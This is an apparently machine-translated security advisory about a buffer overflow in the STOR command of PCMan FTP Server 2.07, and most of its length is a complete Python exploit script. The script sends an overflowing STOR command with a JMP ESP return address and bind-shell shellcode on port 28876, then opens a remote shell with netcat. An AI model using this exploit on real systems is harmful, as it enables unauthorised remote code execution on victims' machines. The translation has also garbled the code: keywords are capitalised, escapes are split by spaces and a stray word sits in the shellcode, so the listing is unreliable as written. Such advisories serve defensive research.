PCMan's FTP Server 'stor' Command Buffer Overflow Vulnerability

Release date:
Updated on: 2013-08-22

Affected Systems:
PCMan FTP Server 2.07
Description:
--------------------------------------------------------------------------------
Bugtraq id: 61840

The PCMan FTP Server is an FTP Server software.

When pcman ftp 2.07 receives a long STOR command with the/../parameter, a buffer overflow is triggered. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.

<* Source: Polunchis
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/python

# Exploit Title: pcman ftp 2.07 STOR Command-buffer overflow
# Date: 18 agsto 2013
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Contact: polunchis@intrusionlabs.org
# Version: pcman ftp 2.07 STOR Command
# Tested on: Windows XP SP3, Spanish
# Thanks: To GOD for giving me wisdom
#
# Description:
# A buffer overflow is triggered when a long STOR command is sent to the server continued of these/../parameters

Import socket, sys, OS, time

If len (sys. argv )! = 3:
Print "[*] Uso: % s <Ip Victima> <Puerto> \ n" % sys. argv [0]
Print "[*] Exploit created by Polunchis"
Print "[*] https://www.intrusionlabs.org"
Sys. exit (0)
Target = sys. argv [1]
Port = int (sys. argv [2])

# Msfpayload windows/shell_bind_tcp LPORT = 28876 R | msfencode-a x86-B '\ x00 \ xff \ x0a \ x0d \ x20 \ x40'-t c
Shellcode = (
"\ Xda \ xcf \ xb8 \ xba \ xb3 \ x1e \ xe7 \ xd9 \ x74 \ x24 \ xf4 \ x5a \ x33 \ xc9 \ xb1"
"\ X56 \ x31 \ x42 \ x18 \ x83 \ xc2 \ x04 \ x03 \ x42 \ xae \ x51 \ xeb \ x1b \ x26 \ x1c"
"\ X14 \ xe4 \ xb6 \ x7f \ x9c \ x01 \ x87 \ xad \ xfa \ x42 \ xb5 \ x61 \ x88 \ x07 \ x35"
"\ X09 \ xdc \ xb3 \ xce \ x7f \ xc9 \ xb4 \ x67 \ x35 \ x2f \ xfa \ x78 \ xfb \ xef \ x50"
"\ Xba \ x9d \ x93 \ xaa \ xee \ x7d \ xad \ x64 \ xe3 \ x7c \ xea \ x99 \ x0b \ x2c \ xa3"
"\ Xd6 \ xb9 \ xc1 \ xc0 \ xab \ x01 \ xe3 \ x06 \ xa0 \ x39 \ x9b \ x23 \ x77 \ xcd \ x11"
"\ X2d \ xa8 \ x7d \ x2d \ x65 \ x50 \ xf6 \ x69 \ x56 \ x61 \ xdb \ x69 \ xaa \ x28 \ x50"
"\ X59 \ x58 \ xab \ xb0 \ x93 \ xa1 \ x9d \ xfc \ x78 \ x9c \ x11 \ xf1 \ x81 \ xd8 \ x96"
"\ Xe9 \ xf7 \ x12 \ xe5 \ x94 \ x0f \ xe1 \ x97 \ x42 \ x85 \ xf4 \ x30 \ x01 \ x3d \ xdd"
"\ Xc1 \ xc6 \ xd8 \ x96 \ xce \ xa3 \ xaf \ xf1 \ xd2 \ x32 \ x63 \ x8a \ xef \ xbf \ x82"
"\ X5d \ x66 \ xfb \ xa0 \ x79 \ x22 \ x58 \ xc8 \ xd8 \ x8e \ x0f \ xf5 \ x3b \ x76 \ xf0"
"\ X53 \ x37 \ x95 \ xe5 \ xe2 \ x1a \ xf2 \ xca \ xd8 \ xa4 \ x02 \ x44 \ x6a \ xd6 \ x30"
"\ Xcb \ xc0 \ cross \ x79 \ x84 \ xce \ x87 \ x7e \ xbf \ xb7 \ x18 \ x81 \ x3f \ xc8 \ x31"
"\ X46 \ x6b \ x98 \ x29 \ x6f \ x13 \ x73 \ xaa \ x90 \ xc6 \ xd4 \ xfa \ x3e \ xb8 \ x94"
"\ Xaa \ xfe \ x68 \ x7d \ xa1 \ xf0 \ x57 \ x9d \ xca \ xda \ xee \ x99 \ x04 \ x3e \ xa3"
"\ X4d \ x65 \ xc0 \ x33 \ x42 \ xe0 \ x26 \ xd9 \ x4a \ xa5 \ xf1 \ x75 \ xa9 \ x92 \ xc9"
"\ Xe2 \ xd2 \ xf0 \ x65 \ xbb \ x44 \ x4c \ x60 \ x7b \ x6a \ x4d \ xa6 \ x28 \ xc7 \ xe5"
"\ X21 \ xba \ x0b \ x32 \ x53 \ xbd \ x01 \ x12 \ x1a \ x86 \ xc2 \ xe8 \ x72 \ x45 \ x72"
"\ Xec \ x5e \ x3d \ x17 \ x7f \ x05 \ xbd \ x5e \ x9c \ x92 \ xea \ x37 \ x52 \ xeb \ x7e"
"\ Xaa \ xcd \ x45 \ x9c \ x37 \ x8b \ xae \ x24 \ xec \ x68 \ x30 \ xa5 \ x61 \ xd4 \ x16"
"\ Xb5 \ xbf \ xd5 \ x12 \ xe1 \ x6f \ x80 \ xcc \ x5f \ xd6 \ x7a \ xbf \ x09 \ x80 \ xd1"
"\ X69 \ xdd \ x55 \ x1a \ xaa \ x9b \ x59 \ x77 \ x5c \ x43 \ xeb \ x2e \ x19 \ x7c \ xc4"
"\ Xa6 \ xad \ x05 \ x38 \ x57 \ x51 \ xdc \ xf8 \ x67 \ x18 \ x7c \ xa8 \ xef \ xc5 \ x15"
"\ Xe8 \ x6d \ xf6 \ xc0 \ x2f \ x88 \ x75 \ xe0 \ xcf \ x6f \ x65 \ x81 \ xca \ x34 \ x21"
"\ X7a \ xa7 \ x25 \ xc4 \ x7c \ x14 \ x45 \ xcd"
)

# 7C86467B FFE4 JMP ESP
# Jmp esp KERNEL32.DLL
Garbage = '\ x41' * 2005
Jmpesp = '\ x7B \ x46 \ x86 \ x7c'
Fixstack = '\ x83 \ xc4 \ x9c'
Vulparameter = '/../'
Nop = '\ x90' * 4

Buffer = garbage + jmpesp + nop + fixstack + shellcode

S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Print "[+] Connect to % s on port % d" % (target, port)
Try:
S. connect (target, port ))
S. recv (1024)
S. send ('user anonymous \ r \ n ')
S. recv (1024)
S. send ('pass polunchis \ r \ n ')
S. recv (1024)
S. send ("STOR" + vulparameter + buffer + "\ r \ n ")
Print "[+] Sending payload of size", len (buffer)
S. close ()
Print "[+] Exploit Sent Successfully"
Print "[+] Waiting for 5 sec before spawning shell to" + target + ": 28876 \ r"
Print "\ r"
Time. sleep (5)
OS. system ("nc-n" + target + "28876 ")
Print "[-] Connection lost from" + target + ": 28876 \ r"
Except t:
Print "[-] cocould not connect to" + target + ": 21 \ r"
Sys. exit (0)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PCMan
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Https://files.secureserver.net/1sMltFOsytirTG